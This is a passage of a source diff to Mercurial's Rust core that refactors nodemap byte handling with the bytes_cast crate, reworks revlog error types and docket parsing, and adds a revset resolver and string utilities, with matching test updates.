+ node::NULL_NODE, Node, NodePrefix, Revision, RevlogIndex, NULL_REVISION,
};
+use bytes_cast::{unaligned, BytesCast};
use std::cmp::max;
use std::fmt;
-use std::mem;
+use std::mem::{self, align_of, size_of};
use std::ops::Deref;
use std::ops::Index;
-use std::slice;
#[derive(Debug, PartialEq)]
pub enum NodeMapError {
MultipleResults,
- InvalidNodePrefix(NodeError),
/// A `Revision` stored in the nodemap could not be found in the index
RevisionNotInIndex(Revision),
}
-impl From<NodeError> for NodeMapError {
- fn from(err: NodeError) -> Self {
- NodeMapError::InvalidNodePrefix(err)
- }
-}
-
/// Mapping system from Mercurial nodes to revision numbers.
///
/// ## `RevlogIndex` and `NodeMap`
@@ -82,24 +74,9 @@
fn find_bin<'a>(
&self,
idx: &impl RevlogIndex,
- prefix: NodePrefixRef<'a>,
+ prefix: NodePrefix,
) -> Result<Option<Revision>, NodeMapError>;
- /// Find the unique Revision whose `Node` hexadecimal string representation
- /// starts with a given prefix
- ///
- /// If no Revision matches the given prefix, `Ok(None)` is returned.
- ///
- /// If several Revisions match the given prefix, a [`MultipleResults`]
- /// error is returned.
- fn find_hex(
- &self,
- idx: &impl RevlogIndex,
- prefix: &str,
- ) -> Result<Option<Revision>, NodeMapError> {
- self.find_bin(idx, NodePrefix::from_hex(prefix)?.borrow())
- }
-
/// Give the size of the shortest node prefix that determines
/// the revision uniquely.
///
@@ -114,19 +91,9 @@
fn unique_prefix_len_bin<'a>(
&self,
idx: &impl RevlogIndex,
- node_prefix: NodePrefixRef<'a>,
+ node_prefix: NodePrefix,
) -> Result<Option<usize>, NodeMapError>;
- /// Same as `unique_prefix_len_bin`, with the hexadecimal representation
- /// of the prefix as input.
- fn unique_prefix_len_hex(
- &self,
- idx: &impl RevlogIndex,
- prefix: &str,
- ) -> Result<Option<usize>, NodeMapError> {
- self.unique_prefix_len_bin(idx, NodePrefix::from_hex(prefix)?.borrow())
- }
-
/// Same as `unique_prefix_len_bin`, with a full `Node` as input
fn unique_prefix_len_node(
&self,
@@ -149,7 +116,7 @@
/// Low level NodeTree [`Blocks`] elements
///
/// These are exactly as for instance on persistent storage.
-type RawElement = i32;
+type RawElement = unaligned::I32Be;
/// High level representation of values in NodeTree
/// [`Blocks`](struct.Block.html)
@@ -168,23 +135,24 @@
///
/// See [`Block`](struct.Block.html) for explanation about the encoding.
fn from(raw: RawElement) -> Element {
- if raw >= 0 {
- Element::Block(raw as usize)
- } else if raw == -1 {
+ let int = raw.get();
+ if int >= 0 {
+ Element::Block(int as usize)
+ } else if int == -1 {
Element::None
} else {
- Element::Rev(-raw - 2)
+ Element::Rev(-int - 2)
}
}
}
impl From<Element> for RawElement {
fn from(element: Element) -> RawElement {
- match element {
+ RawElement::from(match element {
Element::None => 0,
- Element::Block(i) => i as RawElement,
+ Element::Block(i) => i as i32,
Element::Rev(rev) => -rev - 2,
- }
+ })
}
}
@@ -212,42 +180,24 @@
/// represented at all, because we want an immutable empty nodetree
/// to be valid.
-#[derive(Copy, Clone)]
-pub struct Block([u8; BLOCK_SIZE]);
+const ELEMENTS_PER_BLOCK: usize = 16; // number of different values in a nybble
-/// Not derivable for arrays of length >32 until const generics are stable
-impl PartialEq for Block {
- fn eq(&self, other: &Self) -> bool {
- self.0[..] == other.0[..]
- }
-}
-
-pub const BLOCK_SIZE: usize = 64;
+#[derive(Copy, Clone, BytesCast, PartialEq)]
+#[repr(transparent)]
+pub struct Block([RawElement; ELEMENTS_PER_BLOCK]);
impl Block {
fn new() -> Self {
- // -1 in 2's complement to create an absent node
- let byte: u8 = 255;
- Block([byte; BLOCK_SIZE])
+ let absent_node = RawElement::from(-1);
+ Block([absent_node; ELEMENTS_PER_BLOCK])
}
fn get(&self, nybble: u8) -> Element {
- let index = nybble as usize * mem::size_of::<RawElement>();
- Element::from(RawElement::from_be_bytes([
- self.0[index],
- self.0[index + 1],
- self.0[index + 2],
- self.0[index + 3],
- ]))
+ self.0[nybble as usize].into()
}
fn set(&mut self, nybble: u8, element: Element) {
- let values = RawElement::to_be_bytes(element.into());
- let index = nybble as usize * mem::size_of::<RawElement>();
- self.0[index] = values[0];
- self.0[index + 1] = values[1];
- self.0[index + 2] = values[2];
- self.0[index + 3] = values[3];
+ self.0[nybble as usize] = element.into()
}
}
@@ -295,7 +245,7 @@
/// Return `None` unless the `Node` for `rev` has given prefix in `index`.
fn has_prefix_or_none(
idx: &impl RevlogIndex,
- prefix: NodePrefixRef,
+ prefix: NodePrefix,
rev: Revision,
) -> Result<Option<Revision>, NodeMapError> {
idx.node(rev)
@@ -316,7 +266,7 @@
/// revision is the only one for a *subprefix* of the one being looked up.
fn validate_candidate(
idx: &impl RevlogIndex,
- prefix: NodePrefixRef,
+ prefix: NodePrefix,
candidate: (Option<Revision>, usize),
) -> Result<(Option<Revision>, usize), NodeMapError> {
let (rev, steps) = candidate;
@@ -398,16 +348,17 @@
// Transmute the `Vec<Block>` to a `Vec<u8>`. Blocks are contiguous
// bytes, so this is perfectly safe.
let bytes = unsafe {
- // Assert that `Block` hasn't been changed and has no padding
- let _: [u8; 4 * BLOCK_SIZE] =
- std::mem::transmute([Block::new(); 4]);
+ // Check for compatible allocation layout.
+ // (Optimized away by constant-folding + dead code elimination.)
+ assert_eq!(size_of::<Block>(), 64);
+ assert_eq!(align_of::<Block>(), 1);
// /!\ Any use of `vec` after this is use-after-free.
// TODO: use `into_raw_parts` once stabilized
Vec::from_raw_parts(
vec.as_ptr() as *mut u8,
- vec.len() * BLOCK_SIZE,
- vec.capacity() * BLOCK_SIZE,
+ vec.len() * size_of::<Block>(),
+ vec.capacity() * size_of::<Block>(),
)
};
(readonly, bytes)
@@ -442,7 +393,7 @@
/// `NodeTree`).
fn lookup(
&self,
- prefix: NodePrefixRef,
+ prefix: NodePrefix,
) -> Result<(Option<Revision>, usize), NodeMapError> {
for (i, visit_item) in self.visit(prefix).enumerate() {
if let Some(opt) = visit_item.final_revision() {
@@ -452,10 +403,7 @@
Err(NodeMapError::MultipleResults)
}
- fn visit<'n, 'p>(
- &'n self,
- prefix: NodePrefixRef<'p>,
- ) -> NodeTreeVisitor<'n, 'p> {
+ fn visit<'n>(&'n self, prefix: NodePrefix) -> NodeTreeVisitor<'n> {
NodeTreeVisitor {
nt: self,
prefix,
@@ -613,7 +561,7 @@
amount: usize,
) -> Self {
assert!(buffer.len() >= amount);
- let len_in_blocks = amount / BLOCK_SIZE;
+ let len_in_blocks = amount / size_of::<Block>();
NodeTreeBytes {
buffer,
len_in_blocks,
@@ -625,18 +573,17 @@
type Target = [Block];
fn deref(&self) -> &[Block] {
- unsafe {
- slice::from_raw_parts(
- (&self.buffer).as_ptr() as *const Block,
- self.len_in_blocks,
- )
- }
+ Block::slice_from_bytes(&self.buffer, self.len_in_blocks)
+ // `NodeTreeBytes::new` already asserted that `self.buffer` is
+ // large enough.
+ .unwrap()
+ .0
}
}
-struct NodeTreeVisitor<'n, 'p> {
+struct NodeTreeVisitor<'n> {
nt: &'n NodeTree,
- prefix: NodePrefixRef<'p>,
+ prefix: NodePrefix,
visit: usize,
nybble_idx: usize,
done: bool,
@@ -649,11 +596,11 @@
element: Element,
}
-impl<'n, 'p> Iterator for NodeTreeVisitor<'n, 'p> {
+impl<'n> Iterator for NodeTreeVisitor<'n> {
type Item = NodeTreeVisitItem;
fn next(&mut self) -> Option<Self::Item> {
- if self.done || self.nybble_idx >= self.prefix.len() {
+ if self.done || self.nybble_idx >= self.prefix.nybbles_len() {
return None;
}
@@ -718,18 +665,18 @@
fn find_bin<'a>(
&self,
idx: &impl RevlogIndex,
- prefix: NodePrefixRef<'a>,
+ prefix: NodePrefix,
) -> Result<Option<Revision>, NodeMapError> {
- validate_candidate(idx, prefix.clone(), self.lookup(prefix)?)
+ validate_candidate(idx, prefix, self.lookup(prefix)?)
.map(|(opt, _shortest)| opt)
}
fn unique_prefix_len_bin<'a>(
&self,
idx: &impl RevlogIndex,
- prefix: NodePrefixRef<'a>,
+ prefix: NodePrefix,
) -> Result<Option<usize>, NodeMapError> {
- validate_candidate(idx, prefix.clone(), self.lookup(prefix)?)
+ validate_candidate(idx, prefix, self.lookup(prefix)?)
.map(|(opt, shortest)| opt.map(|_rev| shortest))
}
}
@@ -774,13 +721,13 @@
let mut raw = [255u8; 64];
let mut counter = 0;
- for val in [0, 15, -2, -1, -3].iter() {
- for byte in RawElement::to_be_bytes(*val).iter() {
+ for val in [0_i32, 15, -2, -1, -3].iter() {
+ for byte in val.to_be_bytes().iter() {
raw[counter] = *byte;
counter += 1;
}
}
- let block = Block(raw);
+ let (block, _) = Block::from_bytes(&raw).unwrap();
assert_eq!(block.get(0), Element::Block(0));
assert_eq!(block.get(1), Element::Block(15));
assert_eq!(block.get(3), Element::None);
@@ -822,6 +769,10 @@
])
}
+ fn hex(s: &str) -> NodePrefix {
+ NodePrefix::from_hex(s).unwrap()
+ }
+
#[test]
fn test_nt_debug() {
let nt = sample_nodetree();
@@ -840,11 +791,11 @@
pad_insert(&mut idx, 1, "1234deadcafe");
let nt = NodeTree::from(vec![block! {1: Rev(1)}]);
- assert_eq!(nt.find_hex(&idx, "1")?, Some(1));
- assert_eq!(nt.find_hex(&idx, "12")?, Some(1));
- assert_eq!(nt.find_hex(&idx, "1234de")?, Some(1));
- assert_eq!(nt.find_hex(&idx, "1a")?, None);
- assert_eq!(nt.find_hex(&idx, "ab")?, None);
+ assert_eq!(nt.find_bin(&idx, hex("1"))?, Some(1));
+ assert_eq!(nt.find_bin(&idx, hex("12"))?, Some(1));
+ assert_eq!(nt.find_bin(&idx, hex("1234de"))?, Some(1));
+ assert_eq!(nt.find_bin(&idx, hex("1a"))?, None);
+ assert_eq!(nt.find_bin(&idx, hex("ab"))?, None);
// and with full binary Nodes
assert_eq!(nt.find_node(&idx, idx.get(&1).unwrap())?, Some(1));
@@ -861,12 +812,12 @@
let nt = sample_nodetree();
- assert_eq!(nt.find_hex(&idx, "0"), Err(MultipleResults));
- assert_eq!(nt.find_hex(&idx, "01"), Ok(Some(9)));
- assert_eq!(nt.find_hex(&idx, "00"), Err(MultipleResults));
- assert_eq!(nt.find_hex(&idx, "00a"), Ok(Some(0)));
- assert_eq!(nt.unique_prefix_len_hex(&idx, "00a"), Ok(Some(3)));
- assert_eq!(nt.find_hex(&idx, "000"), Ok(Some(NULL_REVISION)));
+ assert_eq!(nt.find_bin(&idx, hex("0")), Err(MultipleResults));
+ assert_eq!(nt.find_bin(&idx, hex("01")), Ok(Some(9)));
+ assert_eq!(nt.find_bin(&idx, hex("00")), Err(MultipleResults));
+ assert_eq!(nt.find_bin(&idx, hex("00a")), Ok(Some(0)));
+ assert_eq!(nt.unique_prefix_len_bin(&idx, hex("00a")), Ok(Some(3)));
+ assert_eq!(nt.find_bin(&idx, hex("000")), Ok(Some(NULL_REVISION)));
}
#[test]
@@ -884,13 +835,13 @@
root: block![0: Block(1), 1:Block(3), 12: Rev(2)],
masked_inner_blocks: 1,
};
- assert_eq!(nt.find_hex(&idx, "10")?, Some(1));
- assert_eq!(nt.find_hex(&idx, "c")?, Some(2));
- assert_eq!(nt.unique_prefix_len_hex(&idx, "c")?, Some(1));
- assert_eq!(nt.find_hex(&idx, "00"), Err(MultipleResults));
- assert_eq!(nt.find_hex(&idx, "000")?, Some(NULL_REVISION));
- assert_eq!(nt.unique_prefix_len_hex(&idx, "000")?, Some(3));
- assert_eq!(nt.find_hex(&idx, "01")?, Some(9));
+ assert_eq!(nt.find_bin(&idx, hex("10"))?, Some(1));
+ assert_eq!(nt.find_bin(&idx, hex("c"))?, Some(2));
+ assert_eq!(nt.unique_prefix_len_bin(&idx, hex("c"))?, Some(1));
+ assert_eq!(nt.find_bin(&idx, hex("00")), Err(MultipleResults));
+ assert_eq!(nt.find_bin(&idx, hex("000"))?, Some(NULL_REVISION));
+ assert_eq!(nt.unique_prefix_len_bin(&idx, hex("000"))?, Some(3));
+ assert_eq!(nt.find_bin(&idx, hex("01"))?, Some(9));
assert_eq!(nt.masked_readonly_blocks(), 2);
Ok(())
}
@@ -923,14 +874,14 @@
&self,
prefix: &str,
) -> Result<Option<Revision>, NodeMapError> {
- self.nt.find_hex(&self.index, prefix)
+ self.nt.find_bin(&self.index, hex(prefix))
}
fn unique_prefix_len_hex(
&self,
prefix: &str,
) -> Result<Option<usize>, NodeMapError> {
- self.nt.unique_prefix_len_hex(&self.index, prefix)
+ self.nt.unique_prefix_len_bin(&self.index, hex(prefix))
}
/// Drain `added` and restart a new one
@@ -1108,7 +1059,7 @@
let (_, bytes) = idx.nt.into_readonly_and_added_bytes();
// only the root block has been changed
- assert_eq!(bytes.len(), BLOCK_SIZE);
+ assert_eq!(bytes.len(), size_of::<Block>());
// big endian for -2
assert_eq!(&bytes[4..2 * 4], [255, 255, 255, 254]);
// big endian for -6
--- a/rust/hg-core/src/revlog/nodemap_docket.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/revlog/nodemap_docket.rs Tue Apr 20 11:01:06 2021 -0400
@@ -1,5 +1,7 @@
+use crate::errors::{HgError, HgResultExt};
+use crate::requirements;
+use bytes_cast::{unaligned, BytesCast};
use memmap::Mmap;
-use std::convert::TryInto;
use std::path::{Path, PathBuf};
use super::revlog::RevlogError;
@@ -13,6 +15,16 @@
// TODO: keep here more of the data from `parse()` when we need it
}
+#[derive(BytesCast)]
+#[repr(C)]
+struct DocketHeader {
+ uid_size: u8,
+ _tip_rev: unaligned::U64Be,
+ data_length: unaligned::U64Be,
+ _data_unused: unaligned::U64Be,
+ tip_node_size: unaligned::U64Be,
+}
+
impl NodeMapDocket {
/// Return `Ok(None)` when the caller should proceed without a persistent
/// nodemap:
@@ -27,83 +39,71 @@
repo: &Repo,
index_path: &Path,
) -> Result<Option<(Self, Mmap)>, RevlogError> {
+ if !repo
+ .requirements()
+ .contains(requirements::NODEMAP_REQUIREMENT)
+ {
+ // If .hg/requires does not opt it, don’t try to open a nodemap
+ return Ok(None);
+ }
+
let docket_path = index_path.with_extension("n");
- let docket_bytes = match repo.store_vfs().read(&docket_path) {
- Err(e) if e.kind() == std::io::ErrorKind::NotFound => {
- return Ok(None)
- }
- Err(e) => return Err(RevlogError::IoError(e)),
- Ok(bytes) => bytes,
+ let docket_bytes = if let Some(bytes) =
+ repo.store_vfs().read(&docket_path).io_not_found_as_none()?
+ {
+ bytes
+ } else {
+ return Ok(None);
};
- let mut input = if let Some((&ONDISK_VERSION, rest)) =
+ let input = if let Some((&ONDISK_VERSION, rest)) =
docket_bytes.split_first()
{
rest
} else {
return Ok(None);
};
- let input = &mut input;
- let uid_size = read_u8(input)? as usize;
- let _tip_rev = read_be_u64(input)?;
+ /// Treat any error as a parse error
+ fn parse<T, E>(result: Result<T, E>) -> Result<T, RevlogError> {
+ result.map_err(|_| {
+ HgError::corrupted("nodemap docket parse error").into()
+ })
+ }
+
+ let (header, rest) = parse(DocketHeader::from_bytes(input))?;
+ let uid_size = header.uid_size as usize;
// TODO: do we care about overflow for 4 GB+ nodemap files on 32-bit
// systems?
- let data_length = read_be_u64(input)? as usize;
- let _data_unused = read_be_u64(input)?;
- let tip_node_size = read_be_u64(input)? as usize;
- let uid = read_bytes(input, uid_size)?;
- let _tip_node = read_bytes(input, tip_node_size)?;
-
- let uid =
- std::str::from_utf8(uid).map_err(|_| RevlogError::Corrupted)?;
+ let tip_node_size = header.tip_node_size.get() as usize;
+ let data_length = header.data_length.get() as usize;
+ let (uid, rest) = parse(u8::slice_from_bytes(rest, uid_size))?;
+ let (_tip_node, _rest) =
+ parse(u8::slice_from_bytes(rest, tip_node_size))?;
+ let uid = parse(std::str::from_utf8(uid))?;
let docket = NodeMapDocket { data_length };
let data_path = rawdata_path(&docket_path, uid);
- // TODO: use `std::fs::read` here when the `persistent-nodemap.mmap`
+ // TODO: use `vfs.read()` here when the `persistent-nodemap.mmap`
// config is false?
- match repo.store_vfs().mmap_open(&data_path) {
- Ok(mmap) => {
- if mmap.len() >= data_length {
- Ok(Some((docket, mmap)))
- } else {
- Err(RevlogError::Corrupted)
- }
+ if let Some(mmap) = repo
+ .store_vfs()
+ .mmap_open(&data_path)
+ .io_not_found_as_none()?
+ {
+ if mmap.len() >= data_length {
+ Ok(Some((docket, mmap)))
+ } else {
+ Err(HgError::corrupted("persistent nodemap too short").into())
}
- Err(error) => {
- if error.kind() == std::io::ErrorKind::NotFound {
- Ok(None)
- } else {
- Err(RevlogError::IoError(error))
- }
- }
+ } else {
+ // Even if .hg/requires opted in, some revlogs are deemed small
+ // enough to not need a persistent nodemap.
+ Ok(None)
}
}
}
-fn read_bytes<'a>(
- input: &mut &'a [u8],
- count: usize,
-) -> Result<&'a [u8], RevlogError> {
- if let Some(start) = input.get(..count) {
- *input = &input[count..];
- Ok(start)
- } else {
- Err(RevlogError::Corrupted)
- }
-}
-
-fn read_u8<'a>(input: &mut &[u8]) -> Result<u8, RevlogError> {
- Ok(read_bytes(input, 1)?[0])
-}
-
-fn read_be_u64<'a>(input: &mut &[u8]) -> Result<u64, RevlogError> {
- let array = read_bytes(input, std::mem::size_of::<u64>())?
- .try_into()
- .unwrap();
- Ok(u64::from_be_bytes(array))
-}
-
fn rawdata_path(docket_path: &Path, uid: &str) -> PathBuf {
let docket_name = docket_path
.file_name()
--- a/rust/hg-core/src/revlog/revlog.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/revlog/revlog.rs Tue Apr 20 11:01:06 2021 -0400
@@ -11,22 +11,39 @@
use zstd;
use super::index::Index;
-use super::node::{NodePrefixRef, NODE_BYTES_LENGTH, NULL_NODE};
+use super::node::{NodePrefix, NODE_BYTES_LENGTH, NULL_NODE};
use super::nodemap;
-use super::nodemap::NodeMap;
+use super::nodemap::{NodeMap, NodeMapError};
use super::nodemap_docket::NodeMapDocket;
use super::patch;
+use crate::errors::HgError;
use crate::repo::Repo;
use crate::revlog::Revision;
+#[derive(derive_more::From)]
pub enum RevlogError {
- IoError(std::io::Error),
- UnsuportedVersion(u16),
InvalidRevision,
+ /// Working directory is not supported
+ WDirUnsupported,
/// Found more than one entry whose ID match the requested prefix
AmbiguousPrefix,
- Corrupted,
- UnknowDataFormat(u8),
+ #[from]
+ Other(HgError),
+}
+
+impl From<NodeMapError> for RevlogError {
+ fn from(error: NodeMapError) -> Self {
+ match error {
+ NodeMapError::MultipleResults => RevlogError::AmbiguousPrefix,
+ NodeMapError::RevisionNotInIndex(_) => RevlogError::corrupted(),
+ }
+ }
+}
+
+impl RevlogError {
+ fn corrupted() -> Self {
+ RevlogError::Other(HgError::corrupted("corrupted revlog"))
+ }
}
/// Read only implementation of revlog.
@@ -34,7 +51,7 @@
/// When index and data are not interleaved: bytes of the revlog index.
/// When index and data are interleaved: bytes of the revlog index and
/// data.
- index: Index,
+ pub(crate) index: Index,
/// When index and data are not interleaved: bytes of the revlog data
data_bytes: Option<Box<dyn Deref<Target = [u8]> + Send>>,
/// When present on disk: the persistent nodemap for this revlog
@@ -53,14 +70,12 @@
data_path: Option<&Path>,
) -> Result<Self, RevlogError> {
let index_path = index_path.as_ref();
- let index_mmap = repo
- .store_vfs()
- .mmap_open(&index_path)
- .map_err(RevlogError::IoError)?;
+ let index_mmap = repo.store_vfs().mmap_open(&index_path)?;
let version = get_version(&index_mmap);
if version != 1 {
- return Err(RevlogError::UnsuportedVersion(version));
+ // A proper new version should have had a repo/store requirement.
+ return Err(RevlogError::corrupted());
}
let index = Index::new(Box::new(index_mmap))?;
@@ -74,10 +89,7 @@
None
} else {
let data_path = data_path.unwrap_or(&default_data_path);
- let data_mmap = repo
- .store_vfs()
- .mmap_open(data_path)
- .map_err(RevlogError::IoError)?;
+ let data_mmap = repo.store_vfs().mmap_open(data_path)?;
Some(Box::new(data_mmap))
};
@@ -111,13 +123,11 @@
#[timed]
pub fn get_node_rev(
&self,
- node: NodePrefixRef,
+ node: NodePrefix,
) -> Result<Revision, RevlogError> {
if let Some(nodemap) = &self.nodemap {
return nodemap
- .find_bin(&self.index, node)
- // TODO: propagate details of this error:
- .map_err(|_| RevlogError::Corrupted)?
+ .find_bin(&self.index, node)?
.ok_or(RevlogError::InvalidRevision);
}
@@ -130,7 +140,9 @@
let mut found_by_prefix = None;
for rev in (0..self.len() as Revision).rev() {
let index_entry =
- self.index.get_entry(rev).ok_or(RevlogError::Corrupted)?;
+ self.index.get_entry(rev).ok_or(HgError::corrupted(
+ "revlog references a revision not in the index",
+ ))?;
if node == *index_entry.hash() {
return Ok(rev);
}
@@ -144,6 +156,11 @@
found_by_prefix.ok_or(RevlogError::InvalidRevision)
}
+ /// Returns whether the given revision exists in this revlog.
+ pub fn has_rev(&self, rev: Revision) -> bool {
+ self.index.get_entry(rev).is_some()
+ }
+
/// Return the full data associated to a revision.
///
/// All entries required to build the final data out of deltas will be
@@ -156,8 +173,9 @@
let mut delta_chain = vec![];
while let Some(base_rev) = entry.base_rev {
delta_chain.push(entry);
- entry =
- self.get_entry(base_rev).or(Err(RevlogError::Corrupted))?;
+ entry = self
+ .get_entry(base_rev)
+ .map_err(|_| RevlogError::corrupted())?;
}
// TODO do not look twice in the index
@@ -180,7 +198,7 @@
) {
Ok(data)
} else {
- Err(RevlogError::Corrupted)
+ Err(RevlogError::corrupted())
}
}
@@ -290,7 +308,8 @@
b'x' => Ok(Cow::Owned(self.uncompressed_zlib_data()?)),
// zstd data.
b'\x28' => Ok(Cow::Owned(self.uncompressed_zstd_data()?)),
- format_type => Err(RevlogError::UnknowDataFormat(format_type)),
+ // A proper new format should have had a repo/store requirement.
+ _format_type => Err(RevlogError::corrupted()),
}
}
@@ -300,13 +319,13 @@
let mut buf = Vec::with_capacity(self.compressed_len);
decoder
.read_to_end(&mut buf)
- .or(Err(RevlogError::Corrupted))?;
+ .map_err(|_| RevlogError::corrupted())?;
Ok(buf)
} else {
let mut buf = vec![0; self.uncompressed_len];
decoder
.read_exact(&mut buf)
- .or(Err(RevlogError::Corrupted))?;
+ .map_err(|_| RevlogError::corrupted())?;
Ok(buf)
}
}
@@ -315,14 +334,14 @@
if self.is_delta() {
let mut buf = Vec::with_capacity(self.compressed_len);
zstd::stream::copy_decode(self.bytes, &mut buf)
- .or(Err(RevlogError::Corrupted))?;
+ .map_err(|_| RevlogError::corrupted())?;
Ok(buf)
} else {
let mut buf = vec![0; self.uncompressed_len];
let len = zstd::block::decompress_to_buffer(self.bytes, &mut buf)
- .or(Err(RevlogError::Corrupted))?;
+ .map_err(|_| RevlogError::corrupted())?;
if len != self.uncompressed_len {
- Err(RevlogError::Corrupted)
+ Err(RevlogError::corrupted())
} else {
Ok(buf)
}
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/rust/hg-core/src/revset.rs Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,62 @@
+//! The revset query language
+//!
+//! <https://www.mercurial-scm.org/repo/hg/help/revsets>
+
+use crate::errors::HgError;
+use crate::repo::Repo;
+use crate::revlog::changelog::Changelog;
+use crate::revlog::revlog::{Revlog, RevlogError};
+use crate::revlog::NodePrefix;
+use crate::revlog::{Revision, NULL_REVISION, WORKING_DIRECTORY_HEX};
+use crate::Node;
+
+/// Resolve a query string into a single revision.
+///
+/// Only some of the revset language is implemented yet.
+pub fn resolve_single(
+ input: &str,
+ repo: &Repo,
+) -> Result<Revision, RevlogError> {
+ let changelog = Changelog::open(repo)?;
+
+ match resolve_rev_number_or_hex_prefix(input, &changelog.revlog) {
+ Err(RevlogError::InvalidRevision) => {} // Try other syntax
+ result => return result,
+ }
+
+ if input == "null" {
+ return Ok(NULL_REVISION);
+ }
+
+ // TODO: support for the rest of the language here.
+
+ Err(
+ HgError::unsupported(format!("cannot parse revset '{}'", input))
+ .into(),
+ )
+}
+
+/// Resolve the small subset of the language suitable for revlogs other than
+/// the changelog, such as in `hg debugdata --manifest` CLI argument.
+///
+/// * A non-negative decimal integer for a revision number, or
+/// * An hexadecimal string, for the unique node ID that starts with this
+/// prefix
+pub fn resolve_rev_number_or_hex_prefix(
+ input: &str,
+ revlog: &Revlog,
+) -> Result<Revision, RevlogError> {
+ if let Ok(integer) = input.parse::<i32>() {
+ if integer >= 0 && revlog.has_rev(integer) {
+ return Ok(integer);
+ }
+ }
+ if let Ok(prefix) = NodePrefix::from_hex(input) {
+ if prefix.is_prefix_of(&Node::from_hex(WORKING_DIRECTORY_HEX).unwrap())
+ {
+ return Err(RevlogError::WDirUnsupported);
+ }
+ return revlog.get_node_rev(prefix);
+ }
+ Err(RevlogError::InvalidRevision)
+}
--- a/rust/hg-core/src/utils.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/utils.rs Tue Apr 20 11:01:06 2021 -0400
@@ -7,7 +7,12 @@
//! Contains useful functions, traits, structs, etc. for use in core.
+use crate::errors::{HgError, IoErrorContext};
use crate::utils::hg_path::HgPath;
+use im_rc::ordmap::DiffItem;
+use im_rc::ordmap::OrdMap;
+use std::cell::Cell;
+use std::fmt;
use std::{io::Write, ops::Deref};
pub mod files;
@@ -62,10 +67,12 @@
}
pub trait SliceExt {
+ fn trim_end_newlines(&self) -> &Self;
fn trim_end(&self) -> &Self;
fn trim_start(&self) -> &Self;
fn trim(&self) -> &Self;
fn drop_prefix(&self, needle: &Self) -> Option<&Self>;
+ fn split_2(&self, separator: u8) -> Option<(&[u8], &[u8])>;
}
#[allow(clippy::trivially_copy_pass_by_ref)]
@@ -74,6 +81,13 @@
}
impl SliceExt for [u8] {
+ fn trim_end_newlines(&self) -> &[u8] {
+ if let Some(last) = self.iter().rposition(|&byte| byte != b'\n') {
+ &self[..=last]
+ } else {
+ &[]
+ }
+ }
fn trim_end(&self) -> &[u8] {
if let Some(last) = self.iter().rposition(is_not_whitespace) {
&self[..=last]
@@ -115,6 +129,13 @@
None
}
}
+
+ fn split_2(&self, separator: u8) -> Option<(&[u8], &[u8])> {
+ let mut iter = self.splitn(2, |&byte| byte == separator);
+ let a = iter.next()?;
+ let b = iter.next()?;
+ Some((a, b))
+ }
}
pub trait Escaped {
@@ -176,3 +197,287 @@
None
}
}
+
+#[cfg(unix)]
+pub fn shell_quote(value: &[u8]) -> Vec<u8> {
+ // TODO: Use the `matches!` macro when we require Rust 1.42+
+ if value.iter().all(|&byte| match byte {
+ b'a'..=b'z'
+ | b'A'..=b'Z'
+ | b'0'..=b'9'
+ | b'.'
+ | b'_'
+ | b'/'
+ | b'+'
+ | b'-' => true,
+ _ => false,
+ }) {
+ value.to_owned()
+ } else {
+ let mut quoted = Vec::with_capacity(value.len() + 2);
+ quoted.push(b'\'');
+ for &byte in value {
+ if byte == b'\'' {
+ quoted.push(b'\\');
+ }
+ quoted.push(byte);
+ }
+ quoted.push(b'\'');
+ quoted
+ }
+}
+
+pub fn current_dir() -> Result<std::path::PathBuf, HgError> {
+ std::env::current_dir().map_err(|error| HgError::IoError {
+ error,
+ context: IoErrorContext::CurrentDir,
+ })
+}
+
+pub fn current_exe() -> Result<std::path::PathBuf, HgError> {
+ std::env::current_exe().map_err(|error| HgError::IoError {
+ error,
+ context: IoErrorContext::CurrentExe,
+ })
+}
+
+/// Expand `$FOO` and `${FOO}` environment variables in the given byte string
+pub fn expand_vars(s: &[u8]) -> std::borrow::Cow<[u8]> {
+ lazy_static::lazy_static! {
+ /// https://github.com/python/cpython/blob/3.9/Lib/posixpath.py#L301
+ /// The `x` makes whitespace ignored.
+ /// `-u` disables the Unicode flag, which makes `\w` like Python with the ASCII flag.
+ static ref VAR_RE: regex::bytes::Regex =
+ regex::bytes::Regex::new(r"(?x-u)
+ \$
+ (?:
+ (\w+)
+ |
+ \{
+ ([^}]*)
+ \}
+ )
+ ").unwrap();
+ }
+ VAR_RE.replace_all(s, |captures: ®ex::bytes::Captures| {
+ let var_name = files::get_os_str_from_bytes(
+ captures
+ .get(1)
+ .or_else(|| captures.get(2))
+ .expect("either side of `|` must participate in match")
+ .as_bytes(),
+ );
+ std::env::var_os(var_name)
+ .map(files::get_bytes_from_os_str)
+ .unwrap_or_else(|| {
+ // Referencing an environment variable that does not exist.
+ // Leave the $FOO reference as-is.
+ captures[0].to_owned()
+ })
+ })
+}
+
+#[test]
+fn test_expand_vars() {
+ // Modifying process-global state in a test isn’t great,
+ // but hopefully this won’t collide with anything.
+ std::env::set_var("TEST_EXPAND_VAR", "1");
+ assert_eq!(
+ expand_vars(b"before/$TEST_EXPAND_VAR/after"),
+ &b"before/1/after"[..]
+ );
+ assert_eq!(
+ expand_vars(b"before${TEST_EXPAND_VAR}${TEST_EXPAND_VAR}${TEST_EXPAND_VAR}after"),
+ &b"before111after"[..]
+ );
+ let s = b"before $SOME_LONG_NAME_THAT_WE_ASSUME_IS_NOT_AN_ACTUAL_ENV_VAR after";
+ assert_eq!(expand_vars(s), &s[..]);
+}
+
+pub(crate) enum MergeResult<V> {
+ UseLeftValue,
+ UseRightValue,
+ UseNewValue(V),
+}
+
+/// Return the union of the two given maps,
+/// calling `merge(key, left_value, right_value)` to resolve keys that exist in
+/// both.
+///
+/// CC https://github.com/bodil/im-rs/issues/166
+pub(crate) fn ordmap_union_with_merge<K, V>(
+ left: OrdMap<K, V>,
+ right: OrdMap<K, V>,
+ mut merge: impl FnMut(&K, &V, &V) -> MergeResult<V>,
+) -> OrdMap<K, V>
+where
+ K: Clone + Ord,
+ V: Clone + PartialEq,
+{
+ if left.ptr_eq(&right) {
+ // One of the two maps is an unmodified clone of the other
+ left
+ } else if left.len() / 2 > right.len() {
+ // When two maps have different sizes,
+ // their size difference is a lower bound on
+ // how many keys of the larger map are not also in the smaller map.
+ // This in turn is a lower bound on the number of differences in
+ // `OrdMap::diff` and the "amount of work" that would be done
+ // by `ordmap_union_with_merge_by_diff`.
+ //
